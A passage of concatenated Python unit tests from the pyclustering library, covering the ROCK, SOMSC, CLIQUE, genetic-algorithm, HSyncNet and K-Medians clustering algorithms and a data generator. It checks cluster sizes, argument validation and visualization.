obtained_length += len(cluster);
obtained_cluster_length.append(len(cluster));
assertion.eq(len(sample), obtained_length);
assertion.eq(len(expected), len(clusters));
assertion.eq(len(expected), len(representatives));
assertion.ge(amount, len(clusters));
dimension = len(sample[0]);
for rep in representatives:
assertion.eq(dimension, len(rep));
expected.sort();
obtained_cluster_length.sort();
assertion.eq(expected, obtained_cluster_length);
```
#### File: cluster/tests/rock_templates.py
```python
from pyclustering.cluster.rock import rock;
from pyclustering.utils import read_sample;
from random import random;
class RockTestTemplates:
@staticmethod
def templateLengthProcessData(path_to_file, radius, cluster_numbers, threshold, expected_cluster_length, ccore):
sample = read_sample(path_to_file);
rock_instance = rock(sample, radius, cluster_numbers, threshold, ccore);
rock_instance.process();
clusters = rock_instance.get_clusters();
length = sum([len(cluster) for cluster in clusters]);
assert len(sample) == length;
obtained_cluster_sizes = [len(cluster) for cluster in clusters];
obtained_cluster_sizes.sort();
expected_cluster_length.sort();
assert obtained_cluster_sizes == expected_cluster_length;
@staticmethod
def templateClusterAllocationOneDimensionData(ccore_flag):
input_data = [ [random()] for i in range(10) ] + [ [random() + 3] for i in range(10) ] + [ [random() + 5] for i in range(10) ] + [ [random() + 8] for i in range(10) ];
rock_instance = rock(input_data, 1, 4, 0.5, ccore_flag);
rock_instance.process();
clusters = rock_instance.get_clusters();
assert len(clusters) == 4;
for cluster in clusters:
assert len(cluster) == 10;
```
#### File: cluster/tests/somsc_templates.py
```python
import numpy
import unittest
from pyclustering.cluster.somsc import somsc
from pyclustering.utils import read_sample
from random import random
class SyncnetTestTemplates(unittest.TestCase):
def templateLengthProcessData(self, path_to_file, amount_clusters, expected_cluster_length, ccore):
sample = read_sample(path_to_file)
somsc_instance = somsc(sample, amount_clusters, 100, ccore)
somsc_instance.process()
clusters = somsc_instance.get_clusters()
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
self.assertEqual(len(sample), sum(obtained_cluster_sizes))
if expected_cluster_length is not None:
obtained_cluster_sizes.sort()
expected_cluster_length.sort()
self.assertEqual(obtained_cluster_sizes,expected_cluster_length)
def templateClusterAllocationOneDimensionData(self, ccore_flag):
input_data = [[random()] for i in range(10)] + [[random() + 3] for i in range(10)] + \
[[random() + 5] for i in range(10)] + [[random() + 8] for i in range(10)]
somsc_instance = somsc(input_data, 4, 100, ccore_flag)
somsc_instance.process()
clusters = somsc_instance.get_clusters()
self.assertEqual(len(clusters), 4)
for cluster in clusters:
self.assertEqual(len(cluster), 10)
def predict(self, path_to_file, amount_clusters, points, expected_closest_clusters, ccore):
sample = read_sample(path_to_file)
somsc_instance = somsc(sample, amount_clusters, 100, ccore)
somsc_instance.process()
closest_clusters = somsc_instance.predict(points)
self.assertEqual(len(expected_closest_clusters), len(closest_clusters))
self.assertTrue(numpy.array_equal(numpy.array(expected_closest_clusters), closest_clusters))
```
#### File: tests/unit/__init__.py
```python
import unittest
from pyclustering.tests.suite_holder import suite_holder
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.unit import ut_agglomerative as cluster_agglomerative_unit_tests
from pyclustering.cluster.tests.unit import ut_bang as cluster_bang_unit_tests
from pyclustering.cluster.tests.unit import ut_birch as cluster_birch_unit_tests
from pyclustering.cluster.tests.unit import ut_bsas as cluster_bsas_unit_tests
from pyclustering.cluster.tests.unit import ut_center_initializer as cluster_center_initializer_unit_tests
from pyclustering.cluster.tests.unit import ut_clarans as cluster_clarans_unit_tests
from pyclustering.cluster.tests.unit import ut_clique as cluster_clique_unit_tests
from pyclustering.cluster.tests.unit import ut_cure as cluster_cure_unit_tests
from pyclustering.cluster.tests.unit import ut_dbscan as cluster_dbscan_unit_tests
from pyclustering.cluster.tests.unit import ut_elbow as cluster_elbow_unit_tests
from pyclustering.cluster.tests.unit import ut_ema as cluster_ema_unit_tests
from pyclustering.cluster.tests.unit import ut_encoder as cluster_encoder_unit_tests
from pyclustering.cluster.tests.unit import ut_fcm as cluster_fcm_unit_tests
from pyclustering.cluster.tests.unit import ut_ga as cluster_ga_unit_tests
from pyclustering.cluster.tests.unit import ut_general as cluster_general_unit_tests
from pyclustering.cluster.tests.unit import ut_generator as cluster_generator_unit_tests
from pyclustering.cluster.tests.unit import ut_gmeans as cluster_gmeans_unit_tests
from pyclustering.cluster.tests.unit import ut_hsyncnet as cluster_hsyncnet_unit_tests
from pyclustering.cluster.tests.unit import ut_kmeans as cluster_kmeans_unit_tests
from pyclustering.cluster.tests.unit import ut_kmedians as cluster_kmedians_unit_tests
from pyclustering.cluster.tests.unit import ut_kmedoids as cluster_kmedoids_unit_tests
from pyclustering.cluster.tests.unit import ut_mbsas as cluster_mbsas_unit_tests
from pyclustering.cluster.tests.unit import ut_optics as cluster_optics_unit_tests
from pyclustering.cluster.tests.unit import ut_rock as cluster_rock_unit_tests
from pyclustering.cluster.tests.unit import ut_silhouette as cluster_silhouette_unit_tests
from pyclustering.cluster.tests.unit import ut_somsc as cluster_somsc_unit_tests
from pyclustering.cluster.tests.unit import ut_syncnet as cluster_syncnet_unit_tests
from pyclustering.cluster.tests.unit import ut_syncsom as cluster_syncsom_unit_tests
from pyclustering.cluster.tests.unit import ut_ttsas as cluster_ttsas_unit_tests
from pyclustering.cluster.tests.unit import ut_visualizer as cluster_visualizer_unit_tests
from pyclustering.cluster.tests.unit import ut_xmeans as cluster_xmeans_unit_tests
class clustering_unit_tests(suite_holder):
def __init__(self):
super().__init__()
self.fill_suite(self.get_suite())
@staticmethod
def fill_suite(unit_cluster_suite):
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_agglomerative_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_bang_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_birch_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_bsas_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_center_initializer_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_clarans_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_clique_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_cure_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_dbscan_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_elbow_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_ema_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_encoder_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_fcm_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_ga_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_general_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_generator_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_gmeans_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_hsyncnet_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_kmeans_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_kmedians_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_kmedoids_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_mbsas_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_optics_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_rock_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_silhouette_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_somsc_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_syncnet_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_syncsom_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_ttsas_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_visualizer_unit_tests))
unit_cluster_suite.addTests(unittest.TestLoader().loadTestsFromModule(cluster_xmeans_unit_tests))
```
#### File: tests/unit/ut_clique.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.clique import clique_block
from pyclustering.cluster.tests.clique_templates import clique_test_template
from pyclustering.tests.assertion import assertion
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
class clique_unit_test(unittest.TestCase):
def test_clustering_sample_simple_1(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 7, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 5, 0, [5, 5], 0, False)
def test_clustering_sample_simple_1_one_cluster(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 0, [10], 0, False)
def test_clustering_diagonal_blocks_arent_neoghbors(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 0, [5, 5], 0, False)
def test_clustering_sample_simple_1_noise_only(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 1000, [], 10, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 6, 10, [], 10, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 5, [], 10, False)
def test_clustering_sample_simple_2(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 7, 0, [5, 8, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 6, 0, [5, 8, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, 0, [23], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 6, 500, [], 23, False)
def test_clustering_sample_simple_3(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 9, 0, [10, 10, 10, 30], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 8, 0, [10, 10, 10, 30], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1, 0, [60], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 6, 500, [], 60, False)
def test_clustering_sample_simple_3_one_point_noise(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 2, 9, [59], 1, False)
def test_clustering_sample_simple_4_one_cluster(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1, 0, [75], 0, False)
def test_clustering_sample_simple_5(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 8, 0, [15, 15, 15, 15], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 7, 0, [15, 15, 15, 15], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 6, 0, [15, 15, 15, 15], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 5, 0, [15, 15, 15, 15], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1, 0, [60], 0, False)
def test_clustering_one_dimensional_data1(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 4, 0, [10, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 0, [20], 0, False)
def test_clustering_one_dimensional_data2(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 15, 0, [15, 20, 30, 80], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 2, 0, [145], 0, False)
def test_clustering_one_dimensional_data_3_similar(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 7, 0, [10, 20], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 0, [30], 0, False)
def test_clustering_sample_simple_10(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 8, 0, [11, 11, 11], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 7, 0, [11, 11, 11], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 2, 0, [33], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, 1, 0, [33], 0, False)
def test_clustering_three_dimensional_data1(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 6, 0, [10, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 5, 0, [10, 10], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, 0, [20], 0, False)
def test_clustering_similar_points(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 8, 0, [5, 5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 7, 0, [5, 5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 5, 0, [5, 5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 2, 0, [15], 0, False)
def test_clustering_zero_column(self):
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 3, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 2, 0, [5, 5], 0, False)
clique_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE13, 1, 0, [10], 0, False)
def test_clustering_fcps_lsun(self):
clique_test_template.clustering(FCPS_SAMPLES.SAMPLE_LSUN, 15, 0, [100, 101, 202], 0, False)
def test_clustering_fcps_hepta(self):
clique_test_template.clustering(FCPS_SAMPLES.SAMPLE_HEPTA, 9, 0, [30, 30, 30, 30, 30, 30, 32], 0, False)
def test_visualize_no_failure_one_dimensional(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 4, 0, False)
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, 7, 0, False)
def test_visualize_no_failure_two_dimensional(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 8, 0, False)
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 0, False)
def test_visualize_no_failure_three_dimensional(self):
clique_test_template.visualize(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 3, 0, False)
def test_argument_invalid_levels(self):
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 0, 0.0, False)
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, -1, 0.0, False)
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, -10, 0.0, False)
def test_argument_invalid_density(self):
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, -1.0, False)
clique_test_template.exception(ValueError, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, -2.0, False)
def test_argument_empty_data(self):
clique_test_template.exception(ValueError, [], 1, 0.0, False)
def test_logical_block_neighbors(self):
block = clique_block()
block.logical_location = [1, 1]
neighbors = block.get_location_neighbors(3)
assertion.eq(4, len(neighbors))
assertion.true([0, 1] in neighbors)
assertion.true([2, 1] in neighbors)
assertion.true([1, 0] in neighbors)
assertion.true([1, 2] in neighbors)
def test_logical_block_neighbors_on_edge(self):
block = clique_block()
block.logical_location = [1, 1]
neighbors = block.get_location_neighbors(2)
assertion.eq(2, len(neighbors))
assertion.true([0, 1] in neighbors)
assertion.true([1, 0] in neighbors)
block.logical_location = [0, 0]
neighbors = block.get_location_neighbors(2)
assertion.eq(2, len(neighbors))
assertion.true([0, 1] in neighbors)
assertion.true([1, 0] in neighbors)
```
#### File: tests/unit/ut_ga.py
```python
import unittest
import inspect
import numpy
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.cluster.ga import genetic_algorithm, ga_observer, ga_visualizer
from pyclustering.cluster.ga_maths import ga_math
from pyclustering.utils import read_sample
class GeneticAlgorithmClusteringUnitTest(unittest.TestCase):
def runGeneticAlgorithm(self, test_case_name, data, count_chromosomes, count_clusters, count_populations,
count_mutations_gen, result_should_be):
_, best_ff, = genetic_algorithm(data=data,
count_clusters=count_clusters,
chromosome_count=count_chromosomes,
population_count=count_populations,
count_mutation_gens=count_mutations_gen, random_state=1000).process()
# Check result
self.assertEqual(best_ff, result_should_be)
def test1CenterClustering(self):
data = [[0, 0], [0, 2]]
self.runGeneticAlgorithm(test_case_name=inspect.stack()[0][3],
data=data,
count_chromosomes=10,
count_clusters=1,
count_populations=10,
count_mutations_gen=1,
result_should_be=2.0)
def test1Center4DataClustering(self):
data = [[0, 0], [0, 2], [2, 0], [2, 2]]
self.runGeneticAlgorithm(test_case_name=inspect.stack()[0][3],
data=data,
count_chromosomes=10,
count_clusters=1,
count_populations=10,
count_mutations_gen=1,
result_should_be=8.0)
def test2Center8DataClustering(self):
data = [[0, 0], [0, 2], [2, 0], [2, 2]]
data.extend([[6, 0], [6, 2], [8, 0], [8, 2]])
self.runGeneticAlgorithm(test_case_name=inspect.stack()[0][3],
data=data,
count_chromosomes=50,
count_clusters=2,
count_populations=50,
count_mutations_gen=1,
result_should_be=16.0)
def test4Center16DataClustering(self):
data = []
data.extend([[0, 0], [1, 0], [0, 1], [1, 1]])
data.extend([[5, 0], [6, 0], [5, 1], [6, 1]])
data.extend([[0, 5], [1, 5], [0, 6], [1, 6]])
data.extend([[4, 4], [7, 4], [4, 7], [7, 7]])
self.runGeneticAlgorithm(test_case_name=inspect.stack()[0][3],
data=data,
count_chromosomes=20,
count_clusters=4,
count_populations=100,
count_mutations_gen=1,
result_should_be=24.0)
def templateDataClustering(self,
sample_path,
amount_clusters,
chromosome_count,
population_count,
count_mutation_gens,
coeff_mutation_count,
expected_clusters_sizes,
**kwargs):
scale_points = kwargs.get('scale_points', None)
sample = numpy.array(read_sample(sample_path))
if scale_points is not None:
sample = sample * scale_points
ga_instance = genetic_algorithm(sample, amount_clusters, chromosome_count, population_count,
count_mutations_gen=count_mutation_gens,
coeff_mutation_count=coeff_mutation_count,
**kwargs)
ga_instance.process()
clusters = ga_instance.get_clusters()
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
self.assertEqual(len(sample), sum(obtained_cluster_sizes))
if expected_clusters_sizes is not None:
obtained_cluster_sizes.sort()
expected_clusters_sizes.sort()
self.assertEqual(obtained_cluster_sizes, expected_clusters_sizes)
def testClusteringTwoDimensionalData(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 20, 20, 2, 0.25, [5, 5], random_state=1000)
def testClusteringTwoDimensionalDataWrongAllocation(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 20, 20, 2, 0.25, [10], random_state=1000)
def testClusteringNonNormalizedValues(self):
self.assertRaises(ValueError, self.templateDataClustering, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 20, 20, 2, 0.25, [5, 5], random_state=1000, scale_points=1000)
def testClusteringSimple02(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 20, 40, 2, 0.25, [5, 8, 10], random_state=1000)
def testClusteringSimple09(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 20, 20, 2, 0.25, [10, 20], random_state=1000)
def testClusteringOneDimensionalData(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 20, 20, 2, 0.25, [10, 10], random_state=1000)
def testClusteringOneDimensionalDataWrongAllocation(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 1, 20, 20, 2, 0.25, [20], random_state=1000)
def testClusteringThreeDimensionalData(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, 20, 20, 2, 0.25, [10, 10], random_state=1000)
def testClusteringThreeDimensionalDataWrongAllocation(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 1, 20, 20, 2, 0.25, [20], random_state=1000)
def testTwoClustersTotallySimilarObjects(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 2, 20, 20, 2, 0.25, None, random_state=1000)
def testFiveClustersTotallySimilarObjects(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 5, 20, 20, 2, 0.25, None, random_state=1000)
def testTenClustersTotallySimilarObjects(self):
self.templateDataClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 10, 20, 20, 2, 0.25, None, random_state=1000)
def templateTestObserverCollecting(self, amount_clusters, iterations, global_optimum, local_optimum, average, **kwargs):
observer_instance = ga_observer(global_optimum, local_optimum, average)
self.assertEqual(0, len(observer_instance))
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
ga_instance = genetic_algorithm(sample, amount_clusters, 20, iterations, count_mutation_gens=2,
coeff_mutation_count=0.25, observer=observer_instance, **kwargs)
ga_instance.process()
self.assertEqual(observer_instance, ga_instance.get_observer())
expected_length = 0
if global_optimum is True:
expected_length = iterations + 1
self.assertEqual(expected_length, len(observer_instance))
self.assertEqual(expected_length, len(observer_instance.get_global_best()['chromosome']))
self.assertEqual(expected_length, len(observer_instance.get_global_best()['fitness_function']))
expected_length = 0
if local_optimum is True:
expected_length = iterations + 1
self.assertEqual(expected_length, len(observer_instance))
self.assertEqual(expected_length, len(observer_instance.get_population_best()['chromosome']))
self.assertEqual(expected_length, len(observer_instance.get_population_best()['fitness_function']))
expected_length = 0
if average is True:
expected_length = iterations + 1
self.assertEqual(expected_length, len(observer_instance))
self.assertEqual(expected_length, len(observer_instance.get_mean_fitness_function()))
if global_optimum is True:
clusters = ga_math.get_clusters_representation(observer_instance.get_global_best()['chromosome'][-1])
self.assertEqual(amount_clusters, len(clusters))
return sample, observer_instance
def testObserveGlobalOptimum(self):
self.templateTestObserverCollecting(2, 10, True, False, False, random_state=1000)
def testObserveLocalOptimum(self):
self.templateTestObserverCollecting(2, 11, False, True, False, random_state=1000)
def testObserveAverage(self):
self.templateTestObserverCollecting(2, 12, False, False, True, random_state=1000)
def testObserveAllParameters(self):
self.templateTestObserverCollecting(2, 9, True, True, True, random_state=1000)
def testObserveNoCollecting(self):
self.templateTestObserverCollecting(2, 9, False, False, False, random_state=1000)
def testObserveParameterCombinations(self):
self.templateTestObserverCollecting(3, 10, True, True, False, random_state=1000)
self.templateTestObserverCollecting(4, 10, True, False, True, random_state=1000)
self.templateTestObserverCollecting(1, 10, False, True, True, random_state=1000)
def testNoFailureVisualizationApi(self):
sample, observer = self.templateTestObserverCollecting(2, 10, True, True, True, random_state=1000)
figure, _ = ga_visualizer.show_evolution(observer)
ga_visualizer.close(figure)
ga_visualizer.show_clusters(sample, observer)
ga_visualizer.animate_cluster_allocation(sample, observer)
def testNoFailureShowEvolution(self):
_, observer = self.templateTestObserverCollecting(2, 10, True, True, True, random_state=1000)
figure, _ = ga_visualizer.show_evolution(observer, 2, 5)
ga_visualizer.close(figure)
figure, _ = ga_visualizer.show_evolution(observer, 2, len(observer))
ga_visualizer.close(figure)
figure, _ = ga_visualizer.show_evolution(observer, 2, len(observer), display=False)
ga_visualizer.close(figure)
def testNoneObserver(self):
sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
ga_instance = genetic_algorithm(sample, 2, 20, 20, count_mutation_gens=2,
coeff_mutation_count=0.25, observer=None)
ga_instance.process()
self.assertIsNone(ga_instance.get_observer())
def test_incorrect_data(self):
self.assertRaises(ValueError, genetic_algorithm, [], 1, 2, 2)
def test_incorrect_amount_clusters(self):
self.assertRaises(ValueError, genetic_algorithm, [[0], [1], [2]], 0, 2, 2)
```
#### File: tests/unit/ut_generator.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.generator import data_generator
from pyclustering.tests.assertion import assertion
class generator_unit_tests(unittest.TestCase):
def assert_dimension(self, data, expected_dimension):
for point in data:
assertion.eq(expected_dimension, len(point))
def assert_distribution(self, data, sizes, centers, widths):
index_cluster = 0
index_cluster_point = 0
actual_means = [[0.0 for _ in range(len(data[0])) ] for _ in range(len(sizes))]
for index_point in range(len(data)):
for index_dimension in range(len(data[0])):
actual_means[index_cluster][index_dimension] += data[index_point][index_dimension]
index_cluster_point += 1
if index_cluster_point == sizes[index_cluster]:
index_cluster_point = 0
index_cluster += 1
for index_cluster in range(len(actual_means)):
for index_dimension in range(len(data[0])):
actual_means[index_cluster][index_dimension] /= sizes[index_cluster]
assertion.ge(centers[index_cluster][index_dimension], actual_means[index_cluster][index_dimension] - widths[index_cluster])
assertion.le(centers[index_cluster][index_dimension], actual_means[index_cluster][index_dimension] + widths[index_cluster])
def test_generate_one_dimension(self):
data = data_generator(2, 1, [10, 10]).generate()
assertion.eq(20, len(data))
self.assert_dimension(data, 1)
def test_generate_two_dimension(self):
data = data_generator(2, 2, [10, 15]).generate()
assertion.eq(25, len(data))
self.assert_dimension(data, 2)
def test_generate_one_cluster(self):
data = data_generator(1, 10, 20).generate()
assertion.eq(20, len(data))
self.assert_dimension(data, 10)
def test_generate_similar_clusters(self):
data = data_generator(10, 2, 10).generate()
assertion.eq(100, len(data))
self.assert_dimension(data, 2)
def test_generate_with_centers(self):
data = data_generator(3, 1, [5, 10, 15], [[0.0], [-5.0], [5.0]]).generate()
assertion.eq(30, len(data))
self.assert_distribution(data, [5, 10, 15], [[0.0], [-5.0], [5.0]], [1.0, 1.0, 1.0])
```
#### File: tests/unit/ut_hsyncnet.py
```python
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.hsyncnet_templates import HsyncnetTestTemplates
from pyclustering.nnet import solve_type
from pyclustering.samples.definitions import SIMPLE_SAMPLES
class HsyncnetUnitTest(unittest.TestCase):
def testClusteringSampleSimple1(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, True, False);
def testClusteringOneAllocationSampleSimple1(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, [10], solve_type.FAST, 5, 0.3, True, False);
def testClusteringSampleSimple1WithoutCollecting(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, [5, 5], solve_type.FAST, 5, 0.3, False, False);
def testClusteringSampleSimple2(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, [10, 5, 8], solve_type.FAST, 5, 0.2, True, False);
def testClusteringOneAllocationSampleSimple2(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1, [23], solve_type.FAST, 5, 0.2, True, False);
def testClusteringOneDimensionDataSampleSimple7(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, [10, 10], solve_type.FAST, 5, 0.3, True, False);
def testClusteringTheSameData1(self):
HsyncnetTestTemplates.templateClustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 3, [5, 5, 5], solve_type.FAST, 5, 0.3, True, False);
def testDynamicLengthCollecting(self):
HsyncnetTestTemplates.templateDynamicLength(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, None, 5, 0.3, True, False);
def testDynamicLengthWithoutCollecting(self):
HsyncnetTestTemplates.templateDynamicLength(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, None, 5, 0.3, False, False);
```
#### File: tests/unit/ut_kmedians.py
```python
import unittest
import numpy
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.kmedians_templates import KmediansTestTemplates
from pyclustering.cluster.kmedians import kmedians
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
from pyclustering.utils.metric import type_metric, distance_metric
class KmediansUnitTest(unittest.TestCase):
def testClusterAllocationSampleSimple1(self):
KmediansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5], [6.7, 7.5]], [5, 5], False)
def testClusterAllocationSampleSimple1Euclidean(self):
metric = distance_metric(type_metric.EUCLIDEAN)
